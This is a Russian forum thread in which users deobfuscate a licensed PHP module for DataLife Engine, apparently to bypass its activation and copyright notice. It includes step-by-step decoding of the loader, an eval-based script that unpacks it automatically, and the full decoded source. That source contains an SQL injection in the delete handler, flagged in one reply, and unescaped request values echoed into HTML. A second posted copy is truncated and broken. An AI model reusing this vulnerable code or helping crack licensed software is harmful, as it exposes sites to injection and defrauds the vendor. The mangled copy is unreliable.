01.10.2009, 23:43

Я пытался как то сам расшифровать код. Хотел бы получить наставление. Мой метод был такой: декодировал (urldecode) и получил символы индексных значений переменного $OOO0000O0. Далее вставив значения идексов вместо {0}{1} и т.д. получилось нечто вроде base64_decode. Мне интересно был ли я на правельном пути? И еще мне совсем не понятно с чего начинать при раскодировке последней строки Rt9ecriecriecr1gIJljP3RgIhxdH2OMR19bYGgcYl9bRZXFRZ .....

Вроде бы находится за пределами php. то есть за return;?>

BlackSun

02.10.2009, 00:35

1. Вырезаем пробелы
2. Приводим скрипт к более читаемому виду, а именно деобфусицируем имена функций

// было
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{ 3}.$OOO000000{5};
/*echo '<br>'.*/$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO00000 0{13}.$OOO000000{16};
/*echo '<br>'.*/$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO00000 0{12}.$OOO0000O0{7}.$OOO000000{5};
/*echo '<br>'.*/$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000 {7}.$OOO000000{5}.$OOO000000{15};
/*echo '<br>'.*/$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{ 5}.$OOO000000{14};
/*echo '<br>'.*/$O0O000O0O=$O0O000O00.$OOO000000{11};
/*echo '<br>'.*/$O0O000O00=$O0O000O00.$OOO000000{3};
/*echo '<br>'.*/$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{ 5}.$OOO000000{9}.$OOO000000{16};
/*echo '<br>'.*/$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000 {8}.$OOO000000{14}.$OOO000000{8};
$OOO0O0O00=__FILE__;
$OO00O0000=14324;

// стало
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{ 3}.$OOO000000{5};
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO00000 0{13}.$OOO000000{16};
// base64_decode $OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO00000 0{12}.$OOO0000O0{7}.$OOO000000{5};
// fopen $OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000 {7}.$OOO000000{5}.$OOO000000{15};
// fget $O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{ 5}.$OOO000000{14};
// fgetc $O0O000O0O=$O0O000O00.$OOO000000{11};
// fgets $O0O000O00=$O0O000O00.$OOO000000{3};
// fread $O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{ 5}.$OOO000000{9}.$OOO000000{16};
// strtr $OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000 {8}.$OOO000000{14}.$OOO000000{8};
// $self - это закодированный файл, вырезано все до самого ?>
/*$OOO0O0O00*/ $self='/var/www/php.old';
/*$OO00O0000*/ $start=14324;

3. Заменим eval на echo, $OOO0000O0 на base64_decode
И получим кусок кода:

$O000O0O00=$OOO000O00($OOO0O0O00,'rb');$O0O00OO00( $O000O0O00,0x499);$OO00O00O0=$OOO0000O0($OOO00000O ($O0O00OO00($O000O0O00,0x17c),'EnteryouwkhRHYKNWOU TAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst uvwxyz0123456789+/'));eval($OO00O00O0);

Суем его вместо строки с eval'ом, предварительно проведя небольшое исправление

// стало
$file=fopen($self,'rb');
$tmp=base64_decode(strtr(fread($file,0x17c),'Enter youwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz012 3456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst uvwxyz0123456789+/'));
echo($tmp);

4. Получаем

$OO00O00O0=str_replace('__FILE__',"'".$OOO0O0O00."'",$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,$OO00 O0000),'EnteryouwkhRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPp QqSsVvXxZz0123456789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst uvwxyz0123456789+/')));fclose($O000O0O00);eval($OO00O00O0);

Суем его заместо echo($tmp);, так же вроведя деобфусикацию

// стало
$tmp = base64_decode(strtr(fread($file,$start),'Enteryouw khRHYKNWOUTAaBbCcDdFfGgIiJjLlMmPpQqSsVvXxZz0123456 789+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrst uvwxyz0123456789+/'));
fclose($file);
echo($tmp);

5. Получаем сорец:

@session_start();
@error_reporting(7);
@ini_set('display_errors',true);
@ini_set('html_errors',false);
define('DATALIFEENGINE',true);
define('ROOT_DIR','../..');
define('ENGINE_DIR','..');
include ENGINE_DIR.'/data/config.php';
@include_once ROOT_DIR.'/language/'.$config['langs'].'/referer.lng';
@include (ENGINE_DIR.'/data/referer.perf.php');
@include (ENGINE_DIR.'/data/referer.conf.php');
@include_once ('engine/api/api.class.php');
if ($config['http_home_url'] == "") {
$config['http_home_url'] = explode("engine/ajax/referer.php",$_SERVER['PHP_SELF']);
$config['http_home_url'] = reset($config['http_home_url']);
$config['http_home_url'] = "http://".$_SERVER['HTTP_HOST'].$config['http_home_url'];
}
$lic_tr = false;
$site_key = str_replace("www.","",strtolower($_SERVER['HTTP_HOST']));
$site_key = md5(md5(base64_encode(md5('['.$site_key.'][43434]'))));
if ($site_key == $confms['key']) $lic_tr = true;
if(!$lic_tr) $confms['func_copyright'] = "yes";
function referer_block_end ($referer) {
global $langms,$dle_api,$confms;
if ($confms['func_copyright'] == "yes") {
$copyright .= "<div align=\"right\" style=\"font-size: 9px; padding-right: 3px;\">Copyright © <a href=\"http://getdle.org.ru/\" target=\"_blank\" style=\"text-decoration: none; font-size: 9px;\">GetDLE</a></div>";
}else $copyright = "";
if (!$referer) $referer = $langms['no_seatrans'];
$referer = $referer.$copyright;
$dle_api->save_to_cache ( 'referer_block',$referer );
return $referer;
}
if ($_REQUEST['option']) {
require_once ENGINE_DIR.'/classes/mysql.php';
require_once ENGINE_DIR.'/data/dbconfig.php';
require_once ROOT_DIR.'/language/'.$config['langs'].'/referer.lng';
$config['charset'] = ($lang['charset'] != '') ?$lang['charset'] : $config['charset'];
require_once ENGINE_DIR.'/inc/include/functions.inc.php';
require_once ENGINE_DIR.'/modules/sitelogin.php';
}
if ($_REQUEST['option'] == "activations") {
$domain = strtolower($_SERVER['HTTP_HOST']);
$key = trim($_REQUEST['key']);
if (!@file_get_contents("http://getdle.org.ru/extras/referer/connect.txt"))
{
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Активация модуля не была произведена, не удалось установить подключение к удаленному серверу. Попробуйте повторить активацию немного позднее.</div>");
}
if (!$key)
{
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Форма не была заполнена, повторите ввод ключа!</div>");
}else {
$host='www.getdle.org.ru';
$path='/extras/referer/activate.php';
$query = "domain={$domain}&key={$key}";
if (@file_get_contents("http://".$host.$path."?".$query) == "yes") {
include_once (ENGINE_DIR.'/data/referer.conf.php');
$site_key = str_replace("www.","",strtolower($_SERVER['HTTP_HOST']));
$site_key = md5(md5(base64_encode(md5('['.$site_key.'][43434]'))));
$confms['key'] = $site_key;
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler,"<?PHP\r\n\$confms = array (\r\n");
foreach($confms as $name =>$value)

{
$value=addslashes($value);
fwrite($handler,"'{$name}' => \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#64c245;\" class=\"navigation\">Благодарим Вас за покупку нашего модуля. Надеемся что работа с ним доставит Вам только удовольствие! Обновите страницу, чтобы приступить к работе!</div>");
}else {
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Активация DataLife Engine не была произведена, введенные данные не соответствуют необходимым, либо данная копия была уже активирована на другом сервере.</div>");
}
};
}elseif ($_REQUEST['option'] == "checkinfo") {
include ENGINE_DIR.'/data/referer.perf.php';
if (in_array($_REQUEST['site'],$engines)) $_REQUEST['site'] = $engine[$_REQUEST['site']]['0'];
$url = str_replace ('www.','',$_REQUEST['site']);
function getBarCY($_url) {
$_uri = "http://bar-navig.yandex.ru/u?ver=2&url=".
urlencode($_url)."&show=1";
$fd = @fopen($_uri,"r");
if ($fd) {
while ($buffer = fgets($fd,4096)) $haystack.=$buffer;
fclose($fd);
preg_match("/<tcy rang=\"(.*)\" value=\"(.*)\"\/>/isU",
$haystack,$cy);
return (int) $cy[2];
}else return 0;
}
$googlehost='toolbarqueries.google.com';
$googleua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5';
function StrToNum($Str,$Check,$Magic) {
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0;$i <$length;$i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check -$Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check <-2147483648) ?($Check +$Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String) {
$Check1 = StrToNum($String,0x1505,0x21);
$Check2 = StrToNum($String,0,0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >>4) &0x3FFFFC0 ) |($Check1 &0x3F);
$Check1 = (($Check1 >>4) &0x3FFC00 ) |($Check1 &0x3FF);
$Check1 = (($Check1 >>4) &0x3C000 ) |($Check1 &0x3FFF);
$T1 = (((($Check1 &0x3C0) <<4) |($Check1 &0x3C)) <<2 ) |($Check2 &0xF0F );
$T2 = (((($Check1 &0xFFFFC000) <<4) |($Check1 &0x3C00)) <<0xA) |($Check2 &0xF0F0000 );
return ($T1 |$T2);
}
function CheckHash($Hashnum) {
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u',$Hashnum);
$length = strlen($HashStr);
for ($i = $length -1;$i >= 0;$i --) {
$Re = $HashStr{$i};
if (1 === ($Flag %2)) {
$Re += $Re;
$Re = (int)($Re / 10) +($Re %10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 -$CheckByte;
if (1 === ($Flag %2) ) {
if (1 === ($CheckByte %2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getch($url) {return CheckHash(HashURL($url));}
function getpr($url) {
global $googlehost,$googleua;
$ch = getch($url);
$fp = @fsockopen($googlehost,80,$errno,$errstr,30);
if ($fp) {
$out = "GET /search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url HTTP/1.1\r\n";
$out .= "User-Agent: $googleua\r\n";
$out .= "Host: $googlehost\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp,$out);
while (!feof($fp)) {
$data = fgets($fp,128);
$pos = strpos($data,"Rank_");
if($pos === false){}else{
$pr=substr($data,$pos +9);
$pr=trim($pr);
$pr=str_replace("\n",'',$pr);
return $pr;
}
}
fclose($fp);
}
}
if(!getpr($url)) {
$pr = "0";
}else {
$pr = getpr($url);
}
$tic = getBarCY("http://".$url);
function dmoz($url) {
$path ="http://search.dmoz.org/cgi-bin/search?search=".str_replace("www.","",$url);
if(!file_exists($path)) {
$data = strip_tags(@implode("",@file($path)));
if(strpos($data,"No Open Directory Project results found")) {
$results = '<a target="_blank" href="http://search.dmoz.org/cgi-bin/search?search='.str_replace("www.","",$url).'">Не описан</a>';
}else {
$results = '<a target="_blank" href="http://search.dmoz.org/cgi-bin/search?search='.str_replace("www.","",$url).'">Есть</a>';
}
}else {
$results = 'нет данных';
}
return $results;
}
$zurl = preg_replace("/^(http:\/\/)/i","",$url);
$zurl = preg_replace("/\/(.*)$/i","",$zurl);
$parse_ya = @file_get_contents('http://bar-navig.yandex.ru/u?ver=2&show=32&url=http://'.$zurl);
function get_yaca($url){
global $parse_ya,$zurl;
preg_match('/<topic title="(.*)" url="(.*)"\/>/i',$parse_ya,$patterns);
$lnk_cat = $patterns[2];
$res = array();
array_push($res,$patterns[1]);
array_push($res,count($patterns[2]));
if(!empty($res[0])){
return 'Есть - <a href="'.$lnk_cat.'">'.$res[0].'</a>';
}else{
return "<a target=\"_blank\" href=\"http://search.yaca.yandex.ru/yca/cy/ch/{$zurl}/\">Не описан</a>";
}
}
$dmoz = dmoz($url);
$yaca = get_yaca($url);
$info .= "<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<td><img alt=\"Это скриншот сайта {$_REQUEST['site']}.\" src=\"http://images.websnapr.com/?url={$_REQUEST['site']}&size=t&nocache=90\" style=\"height:70px; width:90px;\"></td>
<td>
PageRang: <b>{$pr}</b>; Яндекс тИЦ: <b>{$tic}</b>;<br />
Каталог DMOZ: {$dmoz}<br />
Каталог Yandex: {$yaca}<br /><br />
<a href=\"http://{$_REQUEST['site']}\" target=\"_blank\">Перейти на сайт →</a>
</td>
</tr>
</table>";
die($info);
}elseif ($_REQUEST['option'] == "addipignor") {
$site_tog = stristr($confms['ip_ignor'],$_REQUEST['ip']);
if($site_tog) die("Ошибка! IP-адрес {$_REQUEST['ip']} уже был занесен в список игнорируемых IP-адресов.");
if ($confms['ip_ignor']) {
$confms['ip_ignor'] = $confms['ip_ignor'].", ".$_REQUEST['ip'];
}else {
$confms['ip_ignor'] = $_REQUEST['ip'];
}
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler,"<?PHP \r\n\$confms = array (\r\n");
foreach($confms as $name =>$value)
{
$value=trim(stripslashes ($value));
$value=htmlspecialchars ($value,ENT_QUOTES);
fwrite($handler,"'{$name}' => \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("IP-адрес {$_REQUEST['ip']} занесен в список игнорируемых IP-адресов.");
}elseif ($_REQUEST['option'] == "addignor") {
$site_tog = stristr($confms['site_ignor'],$_REQUEST['site']);
if($site_tog) die("Ошибка! Сайт {$_REQUEST['site']} уже был занесен в список игнорируемых сайтов.");
if ($confms['site_ignor']) {
$confms['site_ignor'] = $confms['site_ignor'].", ".$_REQUEST['site'];
}else {
$confms['site_ignor'] = $_REQUEST['site'];
}
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler,"<?PHP \r\n\$confms = array (\r\n");
foreach($confms as $name =>$value)
{
$value=trim(stripslashes ($value));
$value=htmlspecialchars ($value,ENT_QUOTES);
fwrite($handler,"'{$name}' => \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("Сайт {$_REQUEST['site']} занесен в список игнорируемых сайтов.");
}elseif ($_REQUEST['option'] == "confirmdelete") {
$db->query ("DELETE FROM ".PREFIX ."_referer WHERE id = '".$_REQUEST['id'] ."'");
if(($member_id['user_group'] != 1)) {die ("error");}
if ($_REQUEST['user_hash'] == ""OR $_REQUEST['user_hash'] != $dle_login_hash) {
die ("error");
}
die("<div class=\"refer-del\" alt=\"".$langms['sea_delete_info']."\">".$langms['sea_delete']."</div>");
}elseif ($_REQUEST['option'] == "checkupd") {
$update = @file_get_contents("http://www.getdle.org.ru/extras/referer/version.txt");
if($update >$langms['version']) $info = $langms['ref_upd_01'];
elseif($update == $langms['version']) $info = $langms['ref_upd_02'];
elseif($update == "") {$update = "--";$info = $langms['ref_upd_03'];}
elseif($update <$langms['version']) $info = $langms['ref_upd_04'];
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190);padding: 5px;margin-top: 7px;margin-right: 10px;\">Последняя версия: ".$update." (".$info.")</div>");
}

eLWAux

02.10.2009, 03:04

Alex$09:
@session_start();
@error_reporting(7);
@ini_set('display_errors',true);
@ini_set('html_errors',false);
define('DATALIFEENGINE',true);
define('ROOT_DIR','../..');
define('ENGINE_DIR','..');
include ENGINE_DIR.'/data/config.php';
@include_once ROOT_DIR.'/language/'.$config['langs'].'/referer.lng';
@include (ENGINE_DIR.'/data/referer.perf.php');
@include (ENGINE_DIR.'/data/referer.conf.php');
@include_once ('engine/api/api.class.php');
if ($config['http_home_url'] == "") {
$config['http_home_url'] = explode("engine/ajax/referer.php",$_SERVER['PHP_SELF']);
$config['http_home_url'] = reset($config['http_home_url']);
$config['http_home_url'] = "http://".$_SERVER['HTTP_HOST'].$config['http_home_url'];
}
$lic_tr = false;
$site_key = str_replace("www.","",strtolower($_SERVER['HTTP_HOST']));
$site_key = md5(md5(base64_encode(md5('['.$site_key.'][43434]'))));
if ($site_key == $confms['key']) $lic_tr = true;
if(!$lic_tr) $confms['func_copyright'] = "yes";
function referer_block_end ($referer) {
global $langms,$dle_api,$confms;
if ($confms['func_copyright'] == "yes") {
$copyright .= "<div align=\"right\" style=\"font-size: 9px; padding-right: 3px;\">Copyright © <a href=\"http://getdle.org.ru/\" target=\"_blank\" style=\"text-decoration: none; font-size: 9px;\">GetDLE</a></div>";
}else $copyright = "";
if (!$referer) $referer = $langms['no_seatrans'];
$referer = $referer.$copyright;
$dle_api->save_to_cache ( 'referer_block',$referer );
return $referer;
}
if ($_REQUEST['option']) {
require_once ENGINE_DIR.'/classes/mysql.php';
require_once ENGINE_DIR.'/data/dbconfig.php';
require_once ROOT_DIR.'/language/'.$config['langs'].'/referer.lng';
$config['charset'] = ($lang['charset'] != '') ?$lang['charset'] : $config['charset'];
require_once ENGINE_DIR.'/inc/include/functions.inc.php';
require_once ENGINE_DIR.'/modules/sitelogin.php';
}
if ($_REQUEST['option'] == "activations") {
$domain = strtolower($_SERVER['HTTP_HOST']);
$key = trim($_REQUEST['key']);
if (!@file_get_contents("http://getdle.org.ru/extras/referer/connect.txt"))
{
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Активация модуля не была произведена, не удалось установить подключение к удаленному серверу. Попробуйте повторить активацию немного позднее.</div>");
}
if (!$key)
{
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Форма не была заполнена, повторите ввод ключа!</div>");
}else {
$host='www.getdle.org.ru';
$path='/extras/referer/activate.php';
$query = "domain={$domain}&key={$key}";
if (@file_get_contents("http://".$host.$path."?".$query) == "yes") {
include_once (ENGINE_DIR.'/data/referer.conf.php');
$site_key = str_replace("www.","",strtolower($_SERVER['HTTP_HOST']));
$site_key = md5(md5(base64_encode(md5('['.$site_key.'][43434]'))));
$confms['key'] = $site_key;
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler," \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#64c245;\" class=\"navigation\">Благодарим Вас за покупку нашего модуля. Надеемся что работа с ним доставит Вам только удовольствие! Обновите страницу, чтобы приступить к работе!</div>");
}else {
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190); padding: 5px; color:#FF6666;\" class=\"navigation\">Активация DataLife Engine не была произведена, введенные данные не соответствуют необходимым, либо данная копия была уже активирована на другом сервере.</div>");
}
};
}elseif ($_REQUEST['option'] == "checkinfo") {
include ENGINE_DIR.'/data/referer.perf.php';
if (in_array($_REQUEST['site'],$engines)) $_REQUEST['site'] = $engine[$_REQUEST['site']]['0'];
$url = str_replace ('www.','',$_REQUEST['site']);
function getBarCY($_url) {
$_uri = "http://bar-navig.yandex.ru/u?ver=2&url=".
urlencode($_url)."&show=1";
$fd = @fopen($_uri,"r");
if ($fd) {
while ($buffer = fgets($fd,4096)) $haystack.=$buffer;
fclose($fd);
preg_match("/<tcy rang=\"(.*)\" value=\"(.*)\"\/>/isU",
$haystack,$cy);
return (int) $cy[2];
}else return 0;
}
$googlehost='toolbarqueries.google.com';
$googleua='Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5';
function StrToNum($Str,$Check,$Magic) {
$Int32Unit = 4294967296;
$length = strlen($Str);
for ($i = 0;$i <$length;$i++) {
$Check *= $Magic;
if ($Check >= $Int32Unit) {
$Check = ($Check -$Int32Unit * (int) ($Check / $Int32Unit));
$Check = ($Check <-2147483648) ?($Check +$Int32Unit) : $Check;
}
$Check += ord($Str{$i});
}
return $Check;
}
function HashURL($String) {
$Check1 = StrToNum($String,0x1505,0x21);
$Check2 = StrToNum($String,0,0x1003F);
$Check1 >>= 2;
$Check1 = (($Check1 >>4) &0x3FFFFC0 ) |($Check1 &0x3F);
$Check1 = (($Check1 >>4) &0x3FFC00 ) |($Check1 &0x3FF);
$Check1 = (($Check1 >>4) &0x3C000 ) |($Check1 &0x3FFF);
$T1 = (((($Check1 &0x3C0) <<4) |($Check1 &0x3C)) <<2 ) |($Check2 &0xF0F );
$T2 = (((($Check1 &0xFFFFC000) <<4) |($Check1 &0x3C00)) <<0xA) |($Check2 &0xF0F0000 );
return ($T1 |$T2);
}
function CheckHash($Hashnum) {
$CheckByte = 0;
$Flag = 0;
$HashStr = sprintf('%u',$Hashnum);
$length = strlen($HashStr);
for ($i = $length -1;$i >= 0;$i --) {
$Re = $HashStr{$i};
if (1 === ($Flag %2)) {
$Re += $Re;
$Re = (int)($Re / 10) +($Re %10);
}
$CheckByte += $Re;
$Flag ++;
}
$CheckByte %= 10;
if (0 !== $CheckByte) {
$CheckByte = 10 -$CheckByte;
if (1 === ($Flag %2) ) {
if (1 === ($CheckByte %2)) {
$CheckByte += 9;
}
$CheckByte >>= 1;
}
}
return '7'.$CheckByte.$HashStr;
}
function getch($url) {return CheckHash(HashURL($url));}
function getpr($url) {
global $googlehost,$googleua;
$ch = getch($url);
$fp = @fsockopen($googlehost,80,$errno,$errstr,30);
if ($fp) {
$out = "GET /search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url HTTP/1.1\r\n";
$out .= "User-Agent: $googleua\r\n";
$out .= "Host: $googlehost\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp,$out);
while (!feof($fp)) {
$data = fgets($fp,128);
$pos = strpos($data,"Rank_");
if($pos === false){}else{
$pr=substr($data,$pos +9);
$pr=trim($pr);
$pr=str_replace("\n",'',$pr);
return $pr;
}
}
fclose($fp);
}
}
if(!getpr($url)) {
$pr = "0";
}else {
$pr = getpr($url);
}
$tic = getBarCY("http://".$url);
function dmoz($url) {
$path ="http://search.dmoz.org/cgi-bin/search?search=".str_replace("www.","",$url);
if(!file_exists($path)) {
$data = strip_tags(@implode("",@file($path)));
if(strpos($data,"No Open Directory Project results found")) {
$results = '<a target="_blank" href="http://search.dmoz.org/cgi-bin/search?search='.str_replace("www.","",$url).'">Не описан</a>';
}else {
$results = '<a target="_blank" href="http://search.dmoz.org/cgi-bin/search?search='.str_replace("www.","",$url).'">Есть</a>';
}
}else {
$results = 'нет данных';
}
return $results;
}
$zurl = preg_replace("/^(http:\/\/)/i","",$url);
$zurl = preg_replace("/\/(.*)$/i","",$zurl);
$parse_ya = @file_get_contents('http://bar-navig.yandex.ru/u?ver=2&show=32&url=http://'.$zurl);
function get_yaca($url){
global $parse_ya,$zurl;
preg_match('/<topic title="(.*)" url="(.*)"\/>/i',$parse_ya,$patterns);
$lnk_cat = $patterns[2];
$res = array();
array_push($res,$patterns[1]);
array_push($res,count($patterns[2]));
if(!empty($res[0])){
return 'Есть - <a href="'.$lnk_cat.'">'.$res[0].'</a>';
}else{
return "<a target=\"_blank\" href=\"http://search.yaca.yandex.ru/yca/cy/ch/{$zurl}/\">Не описан</a>";
}
}
$dmoz = dmoz($url);
$yaca = get_yaca($url);
$info .= "<table width=\"100%\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">
<tr>
<td><img alt=\"Это скриншот сайта {$_REQUEST['site']}.\" src=\"http://images.websnapr.com/?url={$_REQUEST['site']}&size=t&nocache=90\" style=\"height:70px; width:90px;\"></td>
<td>
PageRang: <b>{$pr}</b>; Яндекс тИЦ: <b>{$tic}</b>;<br />
Каталог DMOZ: {$dmoz}<br />
Каталог Yandex: {$yaca}<br /><br />
<a href=\"http://{$_REQUEST['site']}\" target=\"_blank\">Перейти на сайт →</a>
</td>
</tr>
</table>";
die($info);
}elseif ($_REQUEST['option'] == "addipignor") {
$site_tog = stristr($confms['ip_ignor'],$_REQUEST['ip']);
if($site_tog) die("Ошибка! IP-адрес {$_REQUEST['ip']} уже был занесен в список игнорируемых IP-адресов.");
if ($confms['ip_ignor']) {
$confms['ip_ignor'] = $confms['ip_ignor'].", ".$_REQUEST['ip'];
}else {
$confms['ip_ignor'] = $_REQUEST['ip'];
}
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler," \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("IP-адрес {$_REQUEST['ip']} занесен в список игнорируемых IP-адресов.");
}elseif ($_REQUEST['option'] == "addignor") {
$site_tog = stristr($confms['site_ignor'],$_REQUEST['site']);
if($site_tog) die("Ошибка! Сайт {$_REQUEST['site']} уже был занесен в список игнорируемых сайтов.");
if ($confms['site_ignor']) {
$confms['site_ignor'] = $confms['site_ignor'].", ".$_REQUEST['site'];
}else {
$confms['site_ignor'] = $_REQUEST['site'];
}
$handler = fopen(ENGINE_DIR.'/data/referer.conf.php',"w");
fwrite($handler," \"{$value}\",\r\n");
}
fwrite($handler,");\r\n?>");
fclose($handler);
die("Сайт {$_REQUEST['site']} занесен в список игнорируемых сайтов.");
}elseif ($_REQUEST['option'] == "confirmdelete") {
$db->query ("DELETE FROM ".PREFIX ."_referer WHERE id = '".$_REQUEST['id'] ."'");
if(($member_id['user_group'] != 1)) {die ("error");}
if ($_REQUEST['user_hash'] == ""OR $_REQUEST['user_hash'] != $dle_login_hash) {
die ("error");
}
die("<div class=\"refer-del\" alt=\"".$langms['sea_delete_info']."\">".$langms['sea_delete']."</div>");
}elseif ($_REQUEST['option'] == "checkupd") {
$update = @file_get_contents("http://www.getdle.org.ru/extras/referer/version.txt");
if($update >$langms['version']) $info = $langms['ref_upd_01'];
elseif($update == $langms['version']) $info = $langms['ref_upd_02'];
elseif($update == "") {$update = "--";$info = $langms['ref_upd_03'];}
elseif($update <$langms['version']) $info = $langms['ref_upd_04'];
die("<div style=\"background: lightyellow;border:1px dotted rgb(190,190,190);padding: 5px;margin-top: 7px;margin-right: 10px;\">Последняя версия: ".$update." (".$info.")</div>");
}

eLWAux

02.10.2009, 03:08

в основе етих двух скриптов- ф-ция strtr.
- сперва делает base64_decode куска кода
- исполняя его, читает сам себя
- пропускат начало файла - код, и читает текст, начиная от ?>...
- сперва читает N символов, применяет для них strtr, потом бейс64
- потом опять исполняет его, и читает оставшеюся часть кода
- делает с ним тоже strtr и base64_decode
- на выходе - чистиый код

з.ы:
$db->query ("DELETE FROM ".PREFIX ."_referer WHERE id = '".$_REQUEST['id'] ."'");

Alex$09

02.10.2009, 11:47

Спасибо за код, но я незнаю он правельно переведен или нет но когда я его подменяю он не хочет работать(

sevenup

05.10.2009, 16:19

помогите расшифровать:

87f57a460c276ab1405143ad91ecb2ccd1458198d5a9153791 6c78a3f6555bca3195fbb1b765c28fee886a1346f579b10aca 8d004100159c4c3642b289407af32b74df9a3ffab4b9df8557 f653a3feb7ddb93783b0f9c9d8eb93e3e85e349a1b662b5a86 4686f30e083c27a86c5d1df00feb90da845ec88182ba0d937e 3abc7e0a713c2d11dc129981934a28cd25b972eb3dadb1bb88 bc7e8994ce18eb8ae022ba097bb39e3a0be50a5b5aafc21971 7e6ddbfd930fae3c4000a00770ef60fe975d48f441ff505f2a b85eed6ee246ea3a550dfaa234bbf0ca7d42154c9cd3458b6f 7520f34fdb56924e70445c4945ef6629d82fbc0818e876b583 6c72079aed532b9ddf63f3d8c96f871bf24daeedb210ae3d06 0b767fee5abb19c3d029d1d1ccefecefe177c376f9aec77bcd f890fb9e527dad866888858972877047e659132c5d4de3741e 7b0043b1a192d5e48b991e0f6818f0c2fdc7ad631fc119e480 e9ca3cc71df51eff4acd6777dfc151b4d0d63cc4ee0f45174b 2259788d3a15796694

SQLHACK

06.10.2009, 14:08

дублирую тут.

та обфускация снялась на автомате такой штукой.
(исходный файл сохранен c:/referer.php
<?php

$f = file_get_contents("c:/referer.php");
preg_match("#\<\?php(.+)\?\>#i", $f, $match);
$f = str_replace("eval", "echo", $match[1]);
ob_start(); eval($f); $f = ob_get_contents(); ob_flush();

$OOO0O0O00 = "c:/referer.php";
for($x=1;$x<=2;$x++){
$f = str_replace("eval", "echo", $f);
ob_start(); eval($f); $f = ob_get_contents(); ob_flush();
}

echo $f;

?>

MafyO_o

06.10.2009, 23:06

разшифруйте пл3 етот файл ТыК (http://aload.my1.ru/ref.rar)

eLWAux

07.10.2009, 00:08

разшифруйте пл3 етот файл ТыК (http://aload.my1.ru/ref.rar)
вижу пошло много одинаковых скриптов аля "Copyright 2009 Nikolay Konokhov"..

как его расшифровать:

открывает файл блокнотом
ищем "return;?>", после него идет зашифрований код
удаляем все, оставляем только зашифрований код
пропускаем 380 символов, начиная с начала етого кода (
или: ищем первую позицию: "==")
удаляем первых 380 символов (или текст до "==")
далее создаем php код:
$s = 'тут весь код что остался';
